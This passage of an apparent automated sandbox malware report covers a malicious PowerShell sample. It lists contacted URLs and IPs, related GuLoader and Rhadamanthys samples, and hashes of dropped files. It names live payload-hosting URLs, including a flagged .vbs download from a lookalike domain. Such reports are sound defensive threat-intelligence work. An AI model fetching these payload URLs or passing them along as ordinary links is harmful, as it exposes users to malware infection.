                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.6.drfalse
                      		high
                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.00000150291FE000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.astenterprises.com.pk/ms/Listpowershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://go.micropowershell.exe, 00000000.00000002.2328899793.0000028B125D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.microsoft.copowershell.exe, 00000000.00000002.2422487333.0000028B29AE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.2274805623.000002C55C430000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                                          		high
                                          http://crl.ver)svchost.exe, 00000007.00000002.3369454437.000002C55C612000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://go.microspowershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://astenterprises.com.pkpowershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
                                                      		high
                                                      https://www.astenterprises.com.pkpowershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.2328899793.0000028B134BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2328899793.0000028B1351B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://contoso.com/powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.blupw4maxxlaspw4r.com/ms/ms.vbspowershell.exe, 00000000.00000002.2328899793.0000028B11BD2000.00000004.00000800.00020000.00000000.sdmp, 1M1QoJF40r.ps1true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  203.175.174.69
                                                                  		www.bluemaxxlaser.comSingapore
                                                                  		24482SGGS-AS-APSGGSSGfalse
                                                                  107.161.23.150
                                                                  		astenterprises.com.pkUnited States
                                                                  		3842RAMNODEUSfalse

                                                                  Private

                                                                  IP
                                                                  127.0.0.1

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1578228
                                                                  Start date and time:2024-12-19 12:46:56 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 36s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:16
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:1M1QoJF40r.ps1
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862.ps1
                                                                  Detection:MAL
                                                                  Classification:mal84.evad.winPS1@20/61@5/3
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 8
                                                                  • Number of non-executed functions: 5
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .ps1

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 23.218.208.109, 23.54.80.26, 23.54.80.57, 23.195.61.56, 2.19.198.27, 23.32.239.56, 23.32.238.18, 23.32.238.74, 13.107.246.63, 172.202.163.200, 54.224.241.105, 23.47.168.24
                                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 3924 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 4052 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  06:47:50API Interceptor66x Sleep call for process: powershell.exe modified
                                                                  06:48:03API Interceptor2x Sleep call for process: svchost.exe modified
                                                                  06:48:13API Interceptor2x Sleep call for process: AcroCEF.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  203.175.174.698iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                  ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                                                  64Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • bluemaxxlaser.com/rh/rheu.bin
                                                                  zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                  • bluemaxxlaser.com/rh/rh.bin
                                                                  107.161.23.1508iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                    R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                        tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                          FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                            yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                              0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                    List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      www.bluemaxxlaser.com8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      eua.ps1Get hashmaliciousGuLoaderBrowse
                                                                                      • 203.175.174.69
                                                                                      zp.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      bg.microsoft.map.fastly.net8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 199.232.214.172
                                                                                      R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                      • 199.232.210.172
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.214.172
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      Dix7g8PK1e.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.210.172
                                                                                      contract_signed.pdfGet hashmaliciousUnknownBrowse
                                                                                      • 199.232.214.172

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      RAMNODEUS8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                      • 107.161.23.150
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      SGGS-AS-APSGGSSG8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                      • 203.175.174.69
                                                                                      teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                                                      • 103.14.247.60
                                                                                      na.elfGet hashmaliciousGafgytBrowse
                                                                                      • 103.14.247.29

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      3b5074b1b5d032e5620f69f9f700ff0e8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      fs8cRx6Us2.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      1AqzGcCKey.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150
                                                                                      v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                      • 107.161.23.150
                                                                                      ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                                                                      • 107.161.23.150
                                                                                      BJtvb5Vdhh.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150
                                                                                      HquJT7q6xG.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150
                                                                                      hKvlV6A1Rl.exeGet hashmaliciousQuasarBrowse
                                                                                      • 107.161.23.150

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.7263273223041314
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0T:9JZj5MiKNnNhoxuu
                                                                                      MD5:6DC1940B1D04E6862F07865C3209D8C3
                                                                                      SHA1:EF5C8285475BD58475DE2C8E2328D671889CE82C
                                                                                      SHA-256:50DD168B2D438F89472EB5006D3AD81ED1618D7335E23D013FED276238DB3390
                                                                                      SHA-512:13D76C7E36E13F69D5F9CDDE2F6BE17EA0231C3CC4CE0C048DA6C61676B2DFA1350F891E16231B87C38936505F6BB9A3C664BE94011B77276801A9D27F492576
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x78ff9bd3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.7556099047026907
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                                      MD5:45F59A112C2575FAD855693FD2EF162E
                                                                                      SHA1:29EEACB94E29AAB06428A53B8102F1B95F870CD6
                                                                                      SHA-256:37F8791293328341255BF2C8B49B1CD701E231FC93BBEC18C9C77971CF5E78EB
                                                                                      SHA-512:9314E48432B05049064CEF46F65FB59BE7C21DEEE2E364D4C95D7031C96A22F35DA174028E4E8184B74EC6751284FE7E4F29B8805BCF1CE6832D9ECC62755AA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:x...... .......7.......X\...;...{......................0.e......!...{?..0...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.......................................0...|%...................'..0...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16384
                                                                                      Entropy (8bit):0.08003911600199429
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:+9FWtKYeRBiKluNaAPaU1lxvm/tolluxmO+l/SNxOf:+nyKzRBiKluNDPaUZ+egmOH
                                                                                      MD5:D827EBFFA2F7C07B0E320BEDCE1E5C34
                                                                                      SHA1:0B1811FB46CC3DF1E078C7032ECFFDE050430FFD
                                                                                      SHA-256:D5F25506F7F63ACC27044B393FDBD4E440C805780DAF08F951E9D6CEE171417D
                                                                                      SHA-512:71F139E3E810CF9904792B001857303DCB16160D34374289D63BF96927D45705F55777D4A8E239E53D6CB3AEDF67E1226B64070023D4ECC179DD767A59ABF411
                                                                                      Malicious:false
                                                                                      Preview:..X......................................;...{...0...|...!...{?..........!...{?..!...{?..g...!...{?...................'..0...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.203587485572923
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7DuBVq2PN72nKuAl9OmbnIFUt8ODudgZmw+ODudIkwON72nKuAl9OmbjLJ:7DuBVvVaHAahFUt8ODudg/+ODudI5OaC
                                                                                      MD5:BD5ECBB87E9F0BD77D2684EAAE97E797
                                                                                      SHA1:7A89C3EDDFBCFD7A03376F73AFAB6D3E98848D05
                                                                                      SHA-256:B860C06DAC7C43DC7C0199659E95838B209E7A110E04C0BE22E65FFD417C9125
                                                                                      SHA-512:40D7670F947DA0CA918AA0C04F647FDB6E095294D304826B9F52E5C896F2B64CB8CD975A7339542B803540A35F9E8F1749CFDBCC241ABE27CB452C170827989F
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.905 db4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:02.909 db4 Recovering log #3.2024/12/19-06:48:02.909 db4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.203587485572923
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7DuBVq2PN72nKuAl9OmbnIFUt8ODudgZmw+ODudIkwON72nKuAl9OmbjLJ:7DuBVvVaHAahFUt8ODudg/+ODudI5OaC
                                                                                      MD5:BD5ECBB87E9F0BD77D2684EAAE97E797
                                                                                      SHA1:7A89C3EDDFBCFD7A03376F73AFAB6D3E98848D05
                                                                                      SHA-256:B860C06DAC7C43DC7C0199659E95838B209E7A110E04C0BE22E65FFD417C9125
                                                                                      SHA-512:40D7670F947DA0CA918AA0C04F647FDB6E095294D304826B9F52E5C896F2B64CB8CD975A7339542B803540A35F9E8F1749CFDBCC241ABE27CB452C170827989F
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.905 db4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:02.909 db4 Recovering log #3.2024/12/19-06:48:02.909 db4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):339
                                                                                      Entropy (8bit):5.219010898403811
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D2G+q2PN72nKuAl9Ombzo2jMGIFUt8ODPZZmw+ODE9VkwON72nKuAl9Ombzo2jz:7D2HvVaHAa8uFUt8ODB/+ODa5OaHAa8z
                                                                                      MD5:0DDE58BF2F55046E8CC11C171AD6C2EB
                                                                                      SHA1:48D5C0E2121186D2C58F981C19D4EDD628B9B9C0
                                                                                      SHA-256:10668870987333B47B95856CCE7A668DEC4CB176592FAC55C8DACD8F6B19424B
                                                                                      SHA-512:7D7717A93ABB28E58D40B283CE9000854F7EB5E028709B3C968C5B14FBCD9F55848DBF0319B7538A9A055AB0E7381F4E0A7E8DEC1C92E96BE269B4F54CBCC57B
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.935 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:02.937 d38 Recovering log #3.2024/12/19-06:48:02.938 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):339
                                                                                      Entropy (8bit):5.219010898403811
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D2G+q2PN72nKuAl9Ombzo2jMGIFUt8ODPZZmw+ODE9VkwON72nKuAl9Ombzo2jz:7D2HvVaHAa8uFUt8ODB/+ODa5OaHAa8z
                                                                                      MD5:0DDE58BF2F55046E8CC11C171AD6C2EB
                                                                                      SHA1:48D5C0E2121186D2C58F981C19D4EDD628B9B9C0
                                                                                      SHA-256:10668870987333B47B95856CCE7A668DEC4CB176592FAC55C8DACD8F6B19424B
                                                                                      SHA-512:7D7717A93ABB28E58D40B283CE9000854F7EB5E028709B3C968C5B14FBCD9F55848DBF0319B7538A9A055AB0E7381F4E0A7E8DEC1C92E96BE269B4F54CBCC57B
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.935 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:02.937 d38 Recovering log #3.2024/12/19-06:48:02.938 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\52721b4d-7f48-4ae3-ba1f-85b89beb3cb0.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.971824627296864
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                      MD5:F326539D084B03D88254A74D6018F692
                                                                                      SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                      SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
                                                                                      SHA-512:C8B5B1DD28605D3FCD9EF4A28BE1125137E6B3CB967F59CB2113656C8EFFFB3842115962DF8B25E9C3FA504F5E1B0A116D780326B1AB8062DC6AC0D80E7C3539
                                                                                      Malicious:false
                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341048370594526","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":151499},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                      C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\6d0721d9-f418-46a2-a419-7c82ba09262a.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:modified
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.972695042269216
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sqOsBdOg2Hprcaq3QYiubcP7E4TX:Y2sRdsidMHw3QYhbA7n7
